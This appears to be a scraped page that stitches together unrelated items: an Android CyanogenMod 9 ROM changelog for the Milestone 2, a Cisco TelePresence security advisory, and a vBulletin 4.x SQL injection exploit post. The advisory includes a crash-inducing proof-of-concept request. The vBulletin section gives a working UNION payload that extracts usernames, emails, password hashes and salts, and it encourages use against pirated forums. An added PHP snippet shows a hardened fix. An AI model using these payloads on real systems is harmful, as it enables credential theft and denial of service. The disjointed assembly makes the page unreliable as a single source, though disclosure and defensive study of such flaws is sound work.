Android 4.0.4 almost out of the oven for the Milestone 2 (CyanogenMod 9)


From what can already be gathered, it is reported that, even with a few remaining bugs, there is a ROM available on the XDA forum whose stability is already quite satisfactory.

There is still a little left to do, since the Flash 11 plugin had to be disabled because it was conflicting with a codec.

There is also another bug that may bother some people: Wi-Fi as an access point (tethering).

We can deduce, from the size of the project and its successful debugging effort so far, that very soon (within a few days) we will have a stable and very functional ICS 4.0.4 ROM running smoothly on the Milestone 2. The requirements to run ICS 4.0.4 are already met not only by the Milestone 2 but also by devices such as the Xperia and the i9000 (as well as other lines with very similar hardware); these requirements can be seen here:

http://www.appunix.com.br/blog/quais-os-recursos-necessarios-para-rodar-google-android-4-0-ice-cream-sandwich/

Follow the full changelog:


[ROM][NIGHTLY] CyanogenMod 9 for Motorola Milestone 2 (Android 4.0.4)

Hi All,

This ROM is based on the tezet framework, merging the latest CyanogenMod source code and the camera code from the Defy. It's still an ALPHA version; bug reports are welcome.

Working:
– Features from tezet rom.
– Recording (works, but unstable)
– Panorama (built-in camera app)
– Barcode scanner
– VPN(PPTP MPPE)
– 1% Battery
– H264 high profile decoding(but laggy!)
– HWA (all credit to nadlabak, excellent and fantastic works bring whole BL devices to new stage!!)
– Chrome (http://forum.xda-developers.com/show…&postcount=356)

Not working:
– Flash11 (conflict with TI.720P.Decoder)
– Crystal Talk
– Wifi tether
– bandwidth quota

Known Bugs:
– Brightness sensor
– HW Keyboard function(CAP, ALT)

Changelog:
* 2012/7/8:
– update GPU driver to PVR 1.8
– add nadlabak driver solution
– enable HWA
– remove previous opengl hack
– sync repo 07/08
– delist 3G Roaming bug(http://forum.xda-developers.com/show…&postcount=281)

* 2012/7/1:
– enable TI.720P Decoder (need more fine tune with buffering)
– fix recording problem
– sync repo 07/01

* 2012/6/24:
– fix QWERTZ keyboard
– fix unknown number problem
– new boot animation
– sync repo 06/24

* 2012/6/2:
– barcode scanner works
– built-in VPN with mpppe works (I only test this kind)
– add 1% battery
– fix AZERTY keyboard (thx boorce.com)
– sync repo 06/02

* 2012/5/27:
– fix crash problem when take picture

* 2012/5/26:
– sync cm9 repo
– add panorama support
– add Apollo(music app)
– add CMWallpaper
Bugfix:
– settings->themes will not crash

* 2012/5/11: sync 0511 repo

ADB debugging shouldn’t be disabled, full wipe is recommended.

Downloads:
European GB kernel: CM9-NIGHTLY 
**China GB kernel: CM9-NIGHTLY 
**The China version is not tested by myself, so use it at your own risk.

Google Apps

Repository:
repo init -u git://github.com/alexc804/android.git -b ics

twitter: AlexC804 

Credits to tezet, rondoval, tpruvot and people contributed to this rom.


Cisco TelePresence Multiple Vulnerabilities – SOS-11-010



Sense of Security - Security Advisory - SOS-11-010

Release Date. 19-Sep-2011
Last Update. -
Vendor Notification Date. 21-Feb-2011
Product. Cisco TelePresence Series
Platform. Cisco
Affected versions. C <= TC4.1.2, MXP <= F9.1
Severity Rating. Low - Medium
Impact. Cookie/credential theft, impersonation, loss of confidentiality, client-side code execution, denial of service.
Solution Status. Vendor patch
References.
1. CVE-2011-2544 (CSCtq46488)
2. CVE-2011-2543 (CSCtq46496)
3. CVE-2011-2577 (CSCtq46500)

Details.
Cisco TelePresence is an umbrella term for video conferencing hardware and software, infrastructure and endpoints. The C & MXP Series are the endpoints used on desks or in boardrooms to provide users with a termination point for video conferencing.

1. Post-authentication HTML Injection - CVE-2011-2544 (CSCtq46488):
Cisco TelePresence Endpoints have a web interface (HTTP or HTTPS) for managing, configuring and reporting. It is possible to set the Call ID (with H.323 or SIP) to an HTML value. If a call is made to another endpoint and an authenticated user browses to the web interface on the endpoint receiving the call (e.g. to view call statistics), the HTML will render locally within the context of the logged-in user. From this point it is possible to make changes to the system as the authenticated user. The flaw is due to the flexibility of the H.323 ID or SIP Display Name fields and the failure to correctly validate user input.

Examples (MXP): Rebooting the system:
The attacker may also choose to change passwords in the system, disable
encryption or enable telnet:

2. Post-authentication Memory Corruption - CVE-2011-2543 (CSCtq46496):
Cisco TelePresence systems (Endpoints and Infrastructure) use XPath for
setting and getting configuration.

Example syntax is:
http://ip/getxml?location=/Configuration/Video
The request is sent to a locally listening shell (tshell). This is the
case for all requests relating to performing an action on the system (e.g.
config get or set). The shell then sends the input to the "main"
application (/app/main, id=0), and the data is passed as a parameter.

It was discovered that the getXML handle does not properly perform
length checking on the user supplied input before passing it to the
tshell. Furthermore, there is no length checking performed in the tshell
and no bounds checking performed in the main application where the
parameter is consumed. As such, it is possible to send input that
exceeds the size of the receiving buffer, subsequently causing an
invalid address to be read. This causes a reboot on the Endpoints. The
VCS will not reboot, the process will crash by SIGSEGV (or sigabrt) but
it will restart the process itself which drops all calls.

Proof of Concept:
GET /wsgi/getxml?location="+("A"*5200)+("\x60"*4)+("X"*4)+"HTTP/1.1\r\nHost: 192.168.6.99\r\n\r\n"

Received signal SIGSEGV (11) in thread 0x129e8480, TID 2670
Illegal memory access at: 0x5858585c
Registers:
GPR00: 00f2c908 129e5960 129ef920 00000005 00000040 0000000c 00000037 0f315580
GPR08: 00000005 129e5a70 129e5a80 58585858 0f3272d4 11589858 129e6896 0000000b
GPR16: 129e6084 11164a1c 00000000 129e6894 00000037 1299ca18 00000005 00000002
GPR24: 129e59a8 00000002 0f3ea3a4 129e5a64 00000037 00000005 0f410bac 129e5960
NIP: 0f39abc8 MSR: 0000d032 OGPR3: 00000002

As you can see, the crash string is passed as a parameter in GPR 8.
The severity of this issue is compounded by the fact that the main
application runs as root, this could potentially lead to arbitrary code
execution.

3. Pre-authentication SIP Denial of Service - CVE-2011-2577 (CSCtq46500):
Cisco TelePresence Endpoints utilise SIP for the call setup protocol.
Sending a SIP INVITE with 4x8 "a"s in the MAC Address field and the
receive field causes the system to reboot.

Proof of Concept: MXP:
Exception 0x1100 : Data TLB load miss
Active task FsmMain FSM process : SipTrnsp(0)
FSM message : SipTrnsp_Send_Msg_Req from SipTrnsp(0)
Data TLB miss (DMISS) : 0x00000000 (illegal addr. accessed)

Solution.
Upgrade to TC4.2 for the C series to fix validation issues.

Discovered by.
David Klein, Sense of Security Labs.

About us.
Sense of Security is a leading provider of information
security and risk management solutions. Our team has expert
skills in assessment and assurance, strategy and architecture,
and deployment through to ongoing management. We are
Australia's premier application penetration testing firm and
trusted IT security advisor to many of the country's largest
organisations.

Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA

T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU

The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf

Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php

Source: http://www.exploit-db.com/exploits/17871/

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day



# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S
# Software Link: http://www.vbulletin.com/
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : http://members.vbulletin.com/

######################################################################################################
Vulnerability:
######################################################################################################

vBulletin 4.x.x => 4.1.3 suffers from an SQL injection vulnerability in the "&messagegroupid" parameter due to improper input validation.

#####################################################################################################
Vulnerable Code:
#####################################################################################################

File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Parameter : messagegroupid

if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
{
    $value = $registry->GPC['messagegroupid'];

    if (!is_array($value))
    {
        $value = array($value);
    }

    if (!(in_array(' ', $value) OR in_array('', $value)))
    {
        if ($rst = $vbulletin->db->query_read("
            SELECT socialgroup.name
            FROM " . TABLE_PREFIX . "socialgroup AS socialgroup
--->        WHERE socialgroup.groupid IN (" . implode(', ', $value) . ")")
    }

############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
--> Search Single Content Type

Keywords : Valid Group Message

Search Type : Group Messages

Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
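
The IN (...) clause from the vulnerable code above, rebuilt in its original form and beside a hardened form, as an added example (not vBulletin's own code; the function names and the constructed inputs are assumptions):

```php
<?php
// Added example, not vBulletin's own code: the IN (...) clause from
// search/type/socialgroupmessage.php rebuilt in its vulnerable form and in a
// hardened form that only ever interpolates integers into the SQL text.

// Vulnerable pattern, as on the page: each array element is spliced into the
// SQL verbatim, so a value like "3 ) UNION SELECT ..." becomes part of the query.
function build_group_filter_vulnerable(array $value): string
{
    return "WHERE socialgroup.groupid IN (" . implode(', ', $value) . ")";
}

// Hardened form: a social group id is a positive integer, so anything else is
// rejected outright and the accepted values are cast before interpolation.
// Parameterised placeholders are the alternative where the DB layer offers
// them; query_read() takes a raw string, hence the whitelist plus cast here.
function build_group_filter_hardened(array $value): string
{
    $ids = array();
    foreach ($value as $v) {
        // Only canonical positive decimal integers pass; "3 ", "0x3" and
        // "3 ) UNION ..." are all refused rather than "cleaned".
        $ok = is_int($v)
            ? $v > 0
            : (is_string($v) && preg_match('/^[1-9][0-9]{0,9}$/', $v) === 1);
        if (!$ok) {
            throw new InvalidArgumentException('messagegroupid must be a positive integer');
        }
        $ids[] = (int) $v;
    }
    if ($ids === array()) {
        throw new InvalidArgumentException('no messagegroupid supplied');
    }
    return "WHERE socialgroup.groupid IN (" . implode(', ', $ids) . ")";
}

// Constructed inputs: a normal request and an abbreviated version of the
// request shape shown in the Exploitation section above.
$benign  = array('3', '7');
$hostile = array('3 ) UNION SELECT 1#');

echo build_group_filter_vulnerable($hostile), PHP_EOL;  // injected text is now SQL
try {
    build_group_filter_hardened($hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
echo build_group_filter_hardened($benign), PHP_EOL;
```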

##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day

###########################################################################################
Note:
###########################################################################################

The funny part was that a similar bug was found in the same module, the search query, two months back. Anyway, vBulletin has released a patch, as it was reported to them by altex, hence
customers are safe except those lousy admins. And this bug is for people to play with the many nulled vB sites out there. "Say No to Piracy Disclosure".